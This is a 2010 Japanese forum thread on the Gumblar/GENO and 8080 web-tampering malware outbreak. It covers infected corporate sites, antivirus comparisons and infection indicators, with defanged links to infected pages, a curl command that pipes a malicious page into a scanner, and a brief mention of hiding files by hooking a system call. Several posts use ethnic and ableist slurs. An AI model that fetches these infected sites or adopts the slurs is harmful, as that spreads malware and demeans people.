458名無しさん@お腹いっぱい。:2010/01/06(水) 19:47:36
アンチソフトなんか最後の最後の気休め
それなりに知識あればウイルスなんかかからんし
アホが変なサイト回ってればどれでも同じ
459名無しさん@お腹いっぱい。:2010/01/06(水) 19:54:38
>>458みたいな知的障害者を駆除するソフトが欲しいな
460名無しさん@お腹いっぱい。:2010/01/06(水) 19:54:39
http://pc11.2ch.net/test/read.cgi/pc/1261006089/
461名無しさん@お腹いっぱい。:2010/01/06(水) 19:56:15
対応が遅れる場合あるしな
ぶっちゃけ、各ソフトウェア&Winupdate>セキュリティソフト
で、JS切るかアドオン制御で完全に予防できる
この手のウィルスは無差別攻撃だから変なサイト、個人、法人関わらず平等に危険性があるからノーガード情弱はしねる
462名無しさん@お腹いっぱい。:2010/01/06(水) 19:59:03
>>459
同意w

で、これ皆さんのAV反応する?
http://tsushima.2ch.net/test/read.cgi/news/1262684235/
463名無しさん@お腹いっぱい。:2010/01/06(水) 19:59:42
esetはマジ最悪だからやめとけ
464名無しさん@お腹いっぱい。:2010/01/06(水) 20:02:04
>>463
去年だったか
FWの更新で数日程度、ネット接続できなくなる不具合をやらかしたんだっけ?
465名無しさん@お腹いっぱい。:2010/01/06(水) 20:03:00
はいはい、ウイルスに感染してPCが壊れるよりは大分マシだろ
FWくらいでいちいち騒ぐな
466名無しさん@お腹いっぱい。:2010/01/06(水) 20:17:55
GENOウイルス感染 ローソン
http://tsushima.2ch.net/test/read.cgi/news/1262766483/l50
467名無しさん@お腹いっぱい。:2010/01/06(水) 20:23:47
>>464
うん。
「繋がんねーんだけど…」
キヤノン:「更新していただければ繋がります(キリッ」
「だから繋がんねーんだけど…」
こんな感じだったらしい。
この直後だと思うがFW以外にAV側も誤検知連続してたな。
468名無しさん@お腹いっぱい。:2010/01/06(水) 20:25:13
またアホがぼくの「ういるすそふと」がスゴイ競争か
よそでやれよ
469名無しさん@お腹いっぱい。:2010/01/06(水) 20:27:57
お前のことだ雑音
470454:2010/01/06(水) 20:53:58
>>463
なぜ私のソフトがESETだとわかったw?
471名無しさん@お腹いっぱい。:2010/01/06(水) 20:56:58
キムチ臭いから
472名無しさん@お腹いっぱい。:2010/01/06(水) 20:59:16
本当にわからないんだけど、専ブラでみる分にはウイルス大丈夫なんじゃないの?
473名無しさん@お腹いっぱい。:2010/01/06(水) 21:06:43
p://www●moffle●jp/

モッフルきますた
474名無しさん@お腹いっぱい。:2010/01/06(水) 21:08:06
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
http://pc11.2ch.net/test/read.cgi/sec/1261855221/
の76に直リンがあるから見てみたら画像のサムネイルを保存するタイプの
専ブラならアンチウイルスソフトが侵入を遮断するはず。
475名無しさん@お腹いっぱい。:2010/01/06(水) 21:09:28
モッフルモッフル

>>470
誰もあんたとは言ってない件
最悪はVBだろjk
476名無しさん@お腹いっぱい。:2010/01/06(水) 21:11:27
世界最悪ソフトウイルスバスター伝説乙w
477o゚孕o三:2010/01/06(水) 21:12:06
curl -s http://www.moffle.jp/ | clamdscan -
stream: Trojan.JS-40 FOUND

----------- SCAN SUMMARY -----------
Infected files: 1
Time: 4.612 sec (0 m 4 s)
478名無しさん@お腹いっぱい。:2010/01/06(水) 21:14:42
まあバスターの場合はクライアントをウイルス扱いするからね
アップデートの度に他のDL停止とか常識であり得ないわ
479名無しさん@お腹いっぱい。:2010/01/06(水) 21:15:00
直リンすんなよ在日
480名無しさん@お腹いっぱい。:2010/01/06(水) 21:20:20
直リンクリックなぞ在日以下池沼でもしない
481名無しさん@お腹いっぱい。:2010/01/06(水) 21:20:46
皆さ、どうやって感染したサイト見つけられるの?
482名無しさん@お腹いっぱい。:2010/01/06(水) 21:22:14
在日以外、直リンしない
皆、●つけてるだろ
483名無しさん@お腹いっぱい。:2010/01/06(水) 21:23:04
ばかばっか
484名無しさん@お腹いっぱい。:2010/01/06(水) 21:23:44
また菓子屋か・・・ゴディバとかメリーチョコは無事かな?
485名無しさん@お腹いっぱい。:2010/01/06(水) 21:37:22
今年もGENOウイルスが猛威を振るうのか
486名無しさん@お腹いっぱい。:2010/01/06(水) 21:46:10
そうGENO。
487名無しさん@お腹いっぱい。:2010/01/06(水) 21:50:38
早くも紅白出場決定だな・・・
488名無しさん@お腹いっぱい。:2010/01/06(水) 22:11:18 BE:9904379-2BP(1236)
>>446
GMOにそこの管理者へ連絡してもらったお。
489名無しさん@お腹いっぱい。:2010/01/06(水) 22:21:30
>>448
ノートンが良い
avasは対応が早かったわけでもないのでt薦める意味は全くない
490名無しさん@お腹いっぱい。:2010/01/06(水) 22:23:41
avastはフリーというのが利点
491名無しさん@お腹いっぱい。:2010/01/06(水) 22:26:56
フリーならantivirのが対応は速かった
ノートンの場合は脆弱性を利用した攻撃に対するIPSが優れてるので
新たな脆弱性を利用した攻撃が合ったとしても最初から対応できる可能性が高い
492名無しさん@お腹いっぱい。:2010/01/06(水) 22:28:16
誤解を招かないように訂正
>新たな脆弱性を利用した攻撃
脆弱性を利用した新たな攻撃
493名無しさん@お腹いっぱい。:2010/01/06(水) 22:29:20
avast!は誤検出しまくりのなかで対応したからな
あんまり良い印象はない
494名無しさん@お腹いっぱい。:2010/01/06(水) 22:56:08
順位 プログラム 検出数  検出率
#1 G Data  761,499 99.93%
#2 McAfee  761,431 99.92%
#3 Kaspersky  756,994 99.34%
#4 Symantec  756,734 99.31%
#5 K7 Computing  754,496 99.01%
#6 Microsoft  752,426 98.74%
#7 Eset Nod32  747,278 98.06%
#8 Trend Micro  741,606 97.32%
#9 AVG      737,980 96.84%
#10 Rising   696,220 91.36%

http://antivirus-news.net/2009/12/avtest12-g-data.html

ほらよっ
495名無しさん@お腹いっぱい。:2010/01/06(水) 23:15:43
>>494
マカフィー、あいかーらず地味で無難だな
そこが良くて使ってるが
496名無しさん@お腹いっぱい。:2010/01/06(水) 23:16:07
hosts書き換えって対策にならない?
ウイルスばら撒いてるアドレスを適当なサイトに飛ばせば感染しないよな?
497名無しさん@お腹いっぱい。:2010/01/06(水) 23:19:03
G Dataじゃモロゾフのやつは初期の頃感染した
そんな順位の話なんてしてないだろ
頭悪いやつはそれしか参考に出来ないんだろうけど
498名無しさん@お腹いっぱい。:2010/01/06(水) 23:20:31
ランキングとか糞の役にもたたんだろ
499名無しさん@お腹いっぱい。:2010/01/06(水) 23:20:49
アンチウイルスの優劣は荒れるから出来れば余所で
防御の点である程度は仕方ないだろうけど
500名無しさん@お腹いっぱい。:2010/01/06(水) 23:24:32
>>496
キリがないよ
501名無しさん@お腹いっぱい。:2010/01/06(水) 23:28:17
>>500
みたいですね。
てっきりアドレスは一本でそこから色んなサーバーに繋がってるかと思ってました。
アップデートが一番の対策か。
502名無しさん@お腹いっぱい。:2010/01/07(木) 00:14:36
京王電鉄HPも改ざん被害 ウイルス「ガンブラー」
http://tsushima.2ch.net/test/read.cgi/news/1262784863/
503名無しさん@お腹いっぱい。:2010/01/07(木) 00:47:55
>>502
!!
おrz
504名無しさん@お腹いっぱい。:2010/01/07(木) 00:47:59
>>473
トップページに貼られてるjsも2つともやられとるね。
505名無しさん@お腹いっぱい。:2010/01/07(木) 00:51:58
企業でこれだけあるんだから個人のはもっとあるんだろうな
506名無しさん@お腹いっぱい。:2010/01/07(木) 00:52:14
モッフル、京王電鉄、アウト〜
507名無しさん@お腹いっぱい。:2010/01/07(木) 00:54:51
32 名前: すり鉢(アラバマ州) 投稿日: 2010/01/07(木) 00:45:39.79 ID:RXPRsCkB
p://www●spacecraft●co●jp/home●html
スペースクラフトグループ
神田うの、黒谷友香、栗山千明、岩田さゆり、青山倫子、宇浦冴香、等が所属。

ガンブラーキタ━(゚∀゚)━!!
508名無しさん@お腹いっぱい。:2010/01/07(木) 00:58:38
>>455
必要の無い機能などは停止したり、カスタマイズ設定すればいいんだよ。
何でもデフォの状態や設定なままで、全てを使うことなんてナンセンス。
NIS 2010はまだ、特定の条件や環境で不具合があったりもするらしいぞ。
509名無しさん@お腹いっぱい。:2010/01/07(木) 08:45:57
ぎゃー
きのうローソン99の店舗探しにいってた
はやくはっぴょうしろおy
510名無しさん@お腹いっぱい。:2010/01/07(木) 09:33:36
PDFリーダをUSBメモリで隔離している俺に死角は無い
511名無しさん@お腹いっぱい。:2010/01/07(木) 11:12:28
結局、このGumblarというウイルスは、フリーのソフトだとどれで防げるんですか?
AVGとかAvastとかMicrosoftのやつとかありますけれど
512名無しさん@お腹いっぱい。:2010/01/07(木) 11:19:04
>>511
>>1もみれんのかお前は
あとただでさえ100%安全は保証できないのに亜種多すぎだから、
ただアンチウィルスソフトいれて安心するよりHDDのバックアップとかとっとけ
513名無しさん@お腹いっぱい。:2010/01/07(木) 11:54:18
Gumblarって今一時撤退してるんじゃなかったっけ?
タグが消えてるとかいう記事をどっかで見たが。
今は8080系とかいうやつじゃないの?
喪ッフルも見てきたがガンプラじゃなかった。
ガンプラと8080って別だよね?作者一緒とか?
いろいろ混ざっててよくわからなくなってきた。
514名無しさん@お腹いっぱい。:2010/01/07(木) 12:13:44
亜種が多すぎてよく分かってないんじゃないか?
515名無しさん@お腹いっぱい。:2010/01/07(木) 12:16:31
>>513
Gumblarは再始動している。
http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn&hl=ja
http://www.google.com/safebrowsing/diagnostic?site=martuz.cn&hl=ja
516名無しさん@お腹いっぱい。:2010/01/07(木) 12:19:50
ガンブラー自己中心派。
517名無しさん@お腹いっぱい。:2010/01/07(木) 12:26:09
ついでにYahoo!のも

http://headlines.yahoo.co.jp/hl?a=20100106-00000112-mai-soci
518名無しさん@お腹いっぱい。:2010/01/07(木) 12:34:37
捕捉した。
tp://tollywoodb4u●com/sessions/22564●php
519名無しさん@お腹いっぱい。:2010/01/07(木) 12:35:31
>>513
基本的に新聞社とかwebページが感染した企業はGumblarと8080の区別はしてなくて
両方ともガンブラーと言ってるというのが俺の認識
520名無しさん@お腹いっぱい。:2010/01/07(木) 12:46:40
Gumblarが再始動してるなら尚更8080系とは区別すべきだよ
521名無しさん@お腹いっぱい。:2010/01/07(木) 12:46:44
【画像あり】IPA、注意を喚起「すべてのファイルが『イカ』になる破壊型ウイルス」
http://tsushima.2ch.net/test/read.cgi/news/1262834173/
522名無しさん@お腹いっぱい。:2010/01/07(木) 12:53:20
>>521
それはスレ違い
523名無しさん@お腹いっぱい。:2010/01/07(木) 12:58:21
>>515
うおマジか。情報ありがとう。

>>520
だよな。
ブラウザ閲覧感染という特徴は一緒でも、感染後の挙動とか
全然違う別物なのにひとくくりにするから訳わからなくなる。
なんか豚インフルと季節性インフルみたいだ。
524名無しさん@お腹いっぱい。:2010/01/07(木) 13:01:24
>>513
>>519 のとおり。補足すると
LACが11月に
【注意喚起】Gumblarおよびその亜種に関する大量の感染事例について
ttp://www.lac.co.jp/info/alert/alert20091119.html
を出し(これはGumblar.x)、その後「続報」として(一部使いまわして)
【注意喚起】Gumblar(ガンブラー)ウイルスの組織内感染拡大とホームページ改ざん被害増加に伴う対策の確認
ttp://www.lac.co.jp/info/alert/alert20091225.html
を出した(これは8080)。
JR東日本やホンダは(IPAやJPCERTでは具体名を出していないのでこれを元に)
「Gumblar亜種」との告知を作り、新聞社は「亜種」を外し、後はみんなコピペ、だと思う。

>>521
それはダウソ厨専用、板違い。
http://hideyoshi.2ch.net/download/
525名無しさん@お腹いっぱい。:2010/01/07(木) 13:01:36
それを言ったらこのスレで8080の話題はスレ違いじゃないの?
526名無しさん@お腹いっぱい。:2010/01/07(木) 13:02:05
インフルエンザもウイルスだね。ああおもしろいワロタ
527名無しさん@お腹いっぱい。:2010/01/07(木) 13:06:29
タコとかイカとかはこれっぽっちも関係ないから。まじで。
528名無しさん@お腹いっぱい。:2010/01/07(木) 13:08:27
は?
タコとかGENOよりひどいぞ
画面真黒
529名無しさん@お腹いっぱい。:2010/01/07(木) 13:10:13
ガンプラが再始動してるなら、8080とは区別して動向を追いたいから
全く分けてもらったほうがありがたい気がする。
どちらかが劇的な進化をとげたりした場合に「GENOで〜」「8080で〜」と
前置きがつかないとわからないような状況は面倒くさい。
530名無しさん@お腹いっぱい。:2010/01/07(木) 13:17:24
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
http://pc11.2ch.net/test/read.cgi/sec/1261855221/
こっちと使い分ければ?
531名無しさん@お腹いっぱい。:2010/01/07(木) 13:18:15
改鼠されたWebは交番に届けないのでしょうか?
保険が降りず何のうまみもないので笑い死にするのが普通なのでしょうか?
犯罪者は悪い人なので外事警察に捕まってほしいです
532名無しさん@お腹いっぱい。:2010/01/07(木) 13:25:21
>>530
そっちも見てるけど、GENO専スレのはずのここにも
8080感染サイトとかが貼られたりしてるから
どっちも総合みたいなことになっててややこしくね?w
533名無しさん@お腹いっぱい。:2010/01/07(木) 13:28:30
電源入れるとランプは点灯して本体は起動してるっぽいんだけど
画面は真っ黒でマウスポインタも何も出ないんだが、これも感染?
取り合えず何回か強制終了で起動しなおしたら普通に画面が出たけど
534名無しさん@お腹いっぱい。:2010/01/07(木) 13:31:36
>>530
そっち業者がいるねw
535名無しさん@お腹いっぱい。:2010/01/07(木) 13:42:33
>>530に書き込んだんだけど、その後NOD32に遮断されて行けなくなったのでコチラに。。。

http://pc11.2ch.net/linux/ > GZ > file.htm JS/TrojanDownloader.Agent.NRL トロイの木馬

こっちにも来れなくなるのだろうか。
536名無しさん@お腹いっぱい。:2010/01/07(木) 13:43:40
頭悪いな
537名無しさん@お腹いっぱい。:2010/01/07(木) 14:38:17
NOD32切れってこと?

2010/01/07 14:35:32 HTTP フィルタ アーカイブ http://pc11.2ch.net/test/read.cgi/sec/1261855221/ JS/TrojanDownloader.Agent.NRL トロイの木馬 接続が切断されました
538名無しさん@お腹いっぱい。:2010/01/07(木) 14:45:08
NODが
http://pc11.2ch.net/test/read.cgi/sec/1261855221/380
に反応してるだけでは?
539名無しさん@お腹いっぱい。:2010/01/07(木) 15:02:03
それをこのスレにコピペすれば・・
540名無しさん@お腹いっぱい。:2010/01/07(木) 15:20:51
>>538
なるほどそれかも。
でもhttp://pc11.2ch.net/linuxで出たのはなんだったんだろう・・・

で、JS/TrojanDownloader.Agent.NRLってのが今流行のガンブラーで合ってるのかな?
541名無しさん@お腹いっぱい。:2010/01/07(木) 15:36:46
どんだけー
542名無しさん@お腹いっぱい。:2010/01/07(木) 15:48:30
だって自分で調べるより、お前ら識者に聞いた方が早いじゃん。

でも最初から検索ワードに2ch入れてたのが悪かった。
JS/TrojanDownloader.Agent.NRLだけでググったら分かった。。。
543名無しさん@お腹いっぱい。:2010/01/07(木) 17:26:13
ハウス食品もやられたって
有名企業がこんだけ被害にあってるってことは
個人サイトの被害の規模ってどんだけあるんだろうか;
544名無しさん@お腹いっぱい。:2010/01/07(木) 17:34:14
企業のほうがセキュリティが上だと思うのは幻想
545名無しさん@お腹いっぱい。:2010/01/07(木) 17:35:41
>>543
過去半年の閲覧ページのURLを抽出してみたら
40件が何らかのウィルスに感染していたようだ
js切ってるから全く気にしないがね
546名無しさん@お腹いっぱい。:2010/01/07(木) 17:46:39
>>543
休み明けに騒ぎになるんじゃないのって危惧されてたけど
そうなってきたね。
16日?のアップデートがくれば騒ぎは収まるのだろうか?
547名無しさん@お腹いっぱい。:2010/01/07(木) 17:51:02
今時、企業のHPなのにFTP使ってアップとかどうなのよって思うわ。
548名無しさん@お腹いっぱい。:2010/01/07(木) 17:56:00
USBウイルスが常套化、「Gumblar」などWebからの脅威も続く
p://internet.watch.impress.co.jp/docs/news/20100107_340954.html

仮想マシン上での動作デモ見たかったな
549名無しさん@お腹いっぱい。:2010/01/07(木) 18:00:40
>>546
無理
550名無しさん@お腹いっぱい。:2010/01/07(木) 18:24:18
ガンブラー感染サイト増加  ハウス食品も感染  JR東日本、ホンダ、ローソン、京王電鉄
http://tsushima.2ch.net/test/read.cgi/news/1262852313/
551名無しさん@お腹いっぱい。:2010/01/07(木) 18:27:06
【しょこたん号泣】amebloのブログパーツ「ノートン警察」がトロイに感染
http://tsushima.2ch.net/test/read.cgi/news/1262848963/
552名無しさん@お腹いっぱい。:2010/01/07(木) 18:29:30
2009年のウイルス被害は大幅に減少 IPA調べ
http://tsushima.2ch.net/test/read.cgi/news/1262846244/
553名無しさん@お腹いっぱい。:2010/01/07(木) 18:53:11
>>544
個人サイトやブログは、こまめに更新するから
そのときに管理人が改ざんなどに気づく機会がある。
554名無しさん@お腹いっぱい。:2010/01/07(木) 20:50:08
ttp://www.dotup.org/uploda/www.dotup.org538333.jpg

この状態で大丈夫なんだろうか?
555名無しさん@お腹いっぱい。:2010/01/07(木) 21:27:35
Gumblar感染してないか確認する方法は、GENOと同じ?
556名無しさん@お腹いっぱい。:2010/01/07(木) 21:53:27
違うよ
557名無しさん@お腹いっぱい。:2010/01/07(木) 22:11:00
>>555
最新のやつは
msconfigでスタートアップに次の2つが登録されてなければ感染はないと思う
タスクマネージャーで調べてどちらかが起動していてもまずい

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
558名無しさん@お腹いっぱい。:2010/01/07(木) 22:23:27
sysgif32で検索してヒットしなければ平気?
559名無しさん@お腹いっぱい。:2010/01/07(木) 22:24:54
ガンブラー被害って採用ページとか多いけど
エントリーフォームをつっつく→クロスサイトの一種なんじゃないの?
対策してないフォームが狙われているような気がする

そもそもの報じられている「改ざん」の部分が
FTP進入してソース書き換える基本的な不正アクセスなのか、
フォームや引数にスクリプト書き込んで、その状態のURLを表示させてぶっ壊す方式なのかどっち?

560名無しさん@お腹いっぱい。:2010/01/07(木) 22:30:46
>>559
このスレの書き込み、全く読んでないよね?
561名無しさん@お腹いっぱい。:2010/01/07(木) 22:46:06
>>557すみませんパソコン初心者なんですがどうやって見れば良いか詳しく教えて頂けませんか?

あと、avastとゆうフリーソフト入れてるんですがちゃんと検知してくれますか?
562名無しさん@お腹いっぱい。:2010/01/07(木) 22:54:47
>>559
不正アクセス

>>558
sysgif32の部分はレジストリね
siszyd32.exeと~TMD.tmpって言うファイルがなければ問題ない

ただ違った攻撃もあるからこれで完全に安心というわけではないけど
563名無しさん@お腹いっぱい。:2010/01/07(木) 22:58:02
>>561
「ファイル名を指定して実行」かコマンドプロンプトにmsconfigと打ち込んでエンターキーを押す
[スタートアップ]って言うタブをクリックしてそう言う記述がないか確認
564名無しさん@お腹いっぱい。:2010/01/07(木) 22:58:31
>>559
アホなWebデザイナーな管理者のマシンに感染してjsやhtmlにアレゲなコードを組み込んでいる
そして改竄されたことに気づかぬまま鯖にうp→閲覧した奴にウイルスをばらまく→∞
565名無しさん@お腹いっぱい。:2010/01/07(木) 22:59:46
>>564
FTPのIDパスワード盗むんじゃないの?
566名無しさん@お腹いっぱい。:2010/01/07(木) 23:02:12
>>561
avast!はスクリプトの検知はするのでサイトを見た時点で反応する
ウイルス本体にも反応するがwin.jpg、JavaGame.jar、ChangeLog.pdfなどの
脆弱性攻撃バイナリには反応しない
当然亜種が出ると分からないので、脆弱性持ちのソフトはアップデートして
使っているならAdobe ReaderのAcrobat Javascriptをオフにする
567名無しさん@お腹いっぱい。:2010/01/07(木) 23:02:41
盗んでWEB自動更新
568名無しさん@お腹いっぱい。:2010/01/07(木) 23:02:56
>>558
siszyd32.exeは検索しても見つからないよ
エクスプローラでも見えない
msconfigのスタートアップにあったらやばい
無効にしても復活する

セーフモードだとエクスプローラで見えるようになるのでそこで削除
569名無しさん@お腹いっぱい。:2010/01/07(木) 23:04:07
>>564
管理者のマシンに感染してFTPアカウント情報を盗聴、
入手したFTPアカウントを悪用してサイトを改ざん

だから全然違うがな
570名無しさん@お腹いっぱい。:2010/01/07(木) 23:06:53
>>563詳しく教えて頂きありがとうございました
無かったようです、ひとまず安心して良いのかな?

>>566そうなんですね!
ソフトを常に最新の状態にして、javaはオフにしときます
ありがとうございます
571名無しさん@お腹いっぱい。:2010/01/07(木) 23:08:51
>>569
あら?違うのか
別のウイルスだったかもしれない
572名無しさん@お腹いっぱい。:2010/01/07(木) 23:18:30
>>568
フォルダオプションで隠し属性のファイルも表示させるようにしていても見えないってこと?
573名無しさん@お腹いっぱい。:2010/01/07(木) 23:25:02
>>572
ZwQueryDirectoryFile辺りをフックすればファイルを隠蔽できるはず
ファイルがあるのに見えないように・・・
574名無しさん@お腹いっぱい。:2010/01/07(木) 23:38:23
>>572
うん
エクスプローラじゃないツールなら見えるのもある
消せないけど
575名無しさん@お腹いっぱい。:2010/01/07(木) 23:47:57
8080は、FTPソフトを起動してなくても勝手に改ざんする。
ずっと放置してたサイトが感染後にがっつり改ざんされてたとの報告も。
PC起動している間はずっと改ざんを繰り返すみたいだよ。
576名無しさん@お腹いっぱい。:2010/01/07(木) 23:54:13
ほう、けっこう原始的な改ざん方法なんだな。
てかあんな大手企業サイトが、ローカルPCから直接サーバーへ繋げるような
簡易なインフラ環境ってのがなんか意外だった。
もっと凄い構成組んでるとおもったけど。

577名無しさん@お腹いっぱい。:2010/01/08(金) 00:01:00
>>530の先のレス番99-110あたりに感染後の改ざん挙動報告があるよ
578名無しさん@お腹いっぱい。:2010/01/08(金) 00:18:59
>>576
うーん直接管理してなくて委託にまかせっきりってイメージ持ってたけどなぁ
アンチウィルスソフト会社は流石に違うだろうけど
なんにせよごちゃごちゃ動きまくってるのは嫌だな
579名無しさん@お腹いっぱい。:2010/01/08(金) 01:36:48
委託請け負ってる会社のPCがやられてるから
委託するような大手に被害が出てるのかもね
580名無しさん@お腹いっぱい。:2010/01/08(金) 01:37:35
そう言うのがほとんどだろうね
581名無しさん@お腹いっぱい。:2010/01/08(金) 02:04:41
委託請け負ってる所ってそんなにいい加減なのか?
まあピンキリなのかもしれんがこうも大手企業のサイトが改ざんされると不安になるな
582名無しさん@お腹いっぱい。:2010/01/08(金) 03:33:26
pdfでいろいろやりとりするのが多いからやられるのが多いのかもな
583名無しさん@お腹いっぱい。:2010/01/08(金) 03:39:43
pdfのメッカ、官庁はいまんとこ無事みたいだね
584名無しさん@お腹いっぱい。:2010/01/08(金) 03:41:21
pdfという形式自体を、これを機に廃れさせるべきなんじゃないだろうか
仕事で使うつっても仕事の能率とセキュリティ性なら後者が優先されるべきだし
585名無しさん@お腹いっぱい。:2010/01/08(金) 12:31:39
自分はpdfあんま好きじゃないから消えてもらってもかまわないな
586名無しさん@お腹いっぱい。:2010/01/08(金) 12:44:19
アメーバがGENOウィルス感染! 危険だから今後Ameba Newsをソースにするの禁止な。
http://tsushima.2ch.net/test/read.cgi/news/1262875249/
587名無しさん@お腹いっぱい。:2010/01/08(金) 13:27:12
JREはWindowsVista以降の保護モードに対応してるから、
IEで保護モードで使う設定にしてれば、やられてもごく限られた動作しかできず、
ほとんど影響をうけない

firefoxとかchromeとか保護モード非対応の脆弱なブラウザは使ってないから知らん
588名無しさん@お腹いっぱい。:2010/01/08(金) 13:30:24
でも脆弱性ついてきたら実行されちゃうんでしょ
589名無しさん@お腹いっぱい。:2010/01/08(金) 13:30:38
保護モードなんてバイパス出来るのに・・・
590名無しさん@お腹いっぱい。:2010/01/08(金) 13:39:04
結局きちんと対策してなくちゃ駄目なんだから
OSやブラウザの種類云々は関係ないと思うが
591名無しさん@お腹いっぱい。:2010/01/08(金) 13:51:54
もっと大騒ぎしてほしい
mixiあたりヘマしないかなあ
592名無しさん@お腹いっぱい。:2010/01/08(金) 13:53:32
>>591
愉快犯乙
593名無しさん@お腹いっぱい。:2010/01/08(金) 13:54:28
>>591
もしかして:ロシア人
594名無しさん@お腹いっぱい。:2010/01/08(金) 13:54:44
いやあもっと騒がれたらセキュリティの意識高まるかもしれないじゃん?
595名無しさん@お腹いっぱい。:2010/01/08(金) 13:56:01
Anti Windowsの俺が通りますよっと
596名無しさん@お腹いっぱい。:2010/01/08(金) 14:08:09
>>594
馬鹿と歴史は繰り返されるもの
597名無しさん@お腹いっぱい。:2010/01/08(金) 14:22:12
>>587
保護モードって何?
598名無しさん@お腹いっぱい。:2010/01/08(金) 14:50:26
avast!のWebシールドでも反応しない新ガンブラーが登場
http://tsushima.2ch.net/test/read.cgi/news/1262886266/
599名無しさん@お腹いっぱい。:2010/01/08(金) 17:13:39
盛り上がってるなあ
600名無しさん@お腹いっぱい。:2010/01/08(金) 17:27:04
とうとう警視庁も捜査に乗り出したしな
8080の犯人探すのかGENOの犯人探すのかよくわからんが
できればどっちも見つけてほしいね
601名無しさん@お腹いっぱい。:2010/01/08(金) 17:28:57
>>600
警視庁ってマジ?
ニュースでたのか?
602名無しさん@お腹いっぱい。:2010/01/08(金) 17:30:41
>>601
出た。
今朝の犬HKラジオでトップニュース。
603名無しさん@お腹いっぱい。:2010/01/08(金) 17:32:07
>>597
ttp://msdn.microsoft.com/en-us/library/bb250462(VS.85).aspx
日本語訳もあるけど、UACが旧名称のUAPになってたり機械翻訳みたいだったり基本的にやる気なし。
UACとかユーザーインターフェースの特権分離(UIPI)とかいう仕組みでIEが制限されたモードで実行され、
悪意のあるコードがWindowsに影響を与えるのを防ぐ仕組みが保護モードなのかな。
UACに依存している機能だから例によってUACを無効にしてると機能しない。また、UACが動作していてもIEを管理者で
起動すると保護モードは無効になる。
604名無しさん@お腹いっぱい。:2010/01/08(金) 17:33:48
へー、とうとう警視庁が動くのか
犯人見つかればいいけど捕まえるのは難しいだろうな
605名無しさん@お腹いっぱい。:2010/01/08(金) 17:35:02
>>604
そもそも犯人って何人なんだ?
日本人ではなさそうな予感
606603:2010/01/08(金) 17:35:23
IT Proのこっちの説明のほうがわかりやすいかww
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20070808/279341/

ふーん。勉強になるね。
607名無しさん@お腹いっぱい。:2010/01/08(金) 17:36:30
これ、つかまえたらすごいね。
ハッカー逮捕!とか、でっかく出るのかな。
病原菌?
608名無しさん@お腹いっぱい。:2010/01/08(金) 17:36:36
MSみたいに懸賞金かければいいのに
609名無しさん@お腹いっぱい。:2010/01/08(金) 17:38:00
>>605
複数居てもおかしくないと思う
犯人日本人でなきゃ見つけるのも難しいよな
610名無しさん@お腹いっぱい。:2010/01/08(金) 17:41:29
犯人は日本人じゃねーだろw
中露のどっちかだろうなw
611名無しさん@お腹いっぱい。:2010/01/08(金) 17:43:04
これ、犯人が外国人だったらどーなんの?
どーしょーもない?
612名無しさん@お腹いっぱい。:2010/01/08(金) 17:47:48
今回、仕組み調べるためにあちこちにアクセスしちゃったから、
何かの間違いで調べとか入ったらやばいな。
ウイルスに関しては調べられても何も出てこないが(やってないんだから)、
HDDの中のエロ動画が違法じゃなくても恥ずかしすぎるw
613名無しさん@お腹いっぱい。:2010/01/08(金) 18:03:36
CVE-2009-4324

VRT: Adobe Reader media.newPlayer() Analysis (CVE-2009-4324)
ttp://vrt-sourcefire.blogspot.com/2009/12/adobe-reader-medianewplayer-analysis.html

extraexploit: Adobe CVE-2009-4324 in the wild - (0day) - part 0-6
ttp://extraexploit.blogspot.com/search?q=CVE-2009-4324
614名無しさん@お腹いっぱい。:2010/01/08(金) 18:22:29
感染サイトを意図的にはった人とかも逮捕されたりして
615名無しさん@お腹いっぱい。:2010/01/08(金) 18:30:51
>>614

無いな
616名無しさん@お腹いっぱい。:2010/01/08(金) 18:32:42
特定なんて無理じゃないか?
アクセス解析してうんたらかんたらで出来るもんなのか?
617名無しさん@お腹いっぱい。:2010/01/08(金) 18:35:58
>>616
ウイルス本体が置かれている鯖→ロシア
協力してもらえない予感ww
618名無しさん@お腹いっぱい。:2010/01/08(金) 18:38:34
>>616
時系列に追っていけば最初の発生源が分かる

はず

少なくとも日本国内管理下の鯖の感染第一号は特定できるかも
619名無しさん@お腹いっぱい。:2010/01/08(金) 18:44:59
>>605
そもそも日本企業狙い撃ちする旨味がないし、
テストでなければ日本(在住)人の可能性が高いのでは?
620名無しさん@お腹いっぱい。:2010/01/08(金) 18:45:06
おまえやれ。
621名無しさん@お腹いっぱい。:2010/01/08(金) 18:49:09
感染拡大する以前の導入段階は単純な不正アクセスなんだから特定できるだろうに
というか、だからこそk察が動くって話になってるんだろ
622名無しさん@お腹いっぱい。:2010/01/08(金) 18:50:48
>>619
狙い打ってないです
623名無しさん@お腹いっぱい。:2010/01/08(金) 19:16:58
つうかこれまで動いてなかったんかと
ウイルス製作者って中々捕まらんのだな
アンチウイルスソフト作ってるところが流してるという噂もこういう所から出てきてるんだろうな
624名無しさん@お腹いっぱい。:2010/01/08(金) 19:30:09
genoや8080って
海外の企業も被害出てるの?

日本企業ばかりのイメージがあるんだけど
625名無しさん@お腹いっぱい。:2010/01/08(金) 19:35:12
去年の5月くらいからずっと被害でてるよ
626名無しさん@お腹いっぱい。:2010/01/08(金) 19:40:15
>>623
今回みたいに被害が大きくならないと動けないんじゃね?
動いても犯人捕まえられそうにない予感
627名無しさん@お腹いっぱい。:2010/01/08(金) 22:19:14
日本人じゃないしな
>>624
日本語のニュースが出てないだけじゃね
企業かどうかとか国がどこかとか区別されていない
628名無しさん@お腹いっぱい。:2010/01/08(金) 22:47:09
日本の警察が捕まえられるのはP2P利用者のような
権力があれば誰でも捕まえられるレベルだけ。
629名無しさん@お腹いっぱい。:2010/01/08(金) 22:53:06
日本の警察に何ができるの?
部下「課長、ノートン警察ってのがありますよ」
課長「よし!そこへ協力を頼もう」
とかじゃないよね
630名無しさん@お腹いっぱい。:2010/01/08(金) 23:02:52
まぁ、無理だな

調べたところで、botと串が出てきて終わりだろ

民主党が不正アクセスに加担していた なんて事になればもっと無理
631名無しさん@お腹いっぱい。:2010/01/08(金) 23:04:26
>>611
いんたーぽーるがなんとかするのでは
632名無しさん@お腹いっぱい。:2010/01/08(金) 23:05:59
やばいwちょっとわろたwwwww
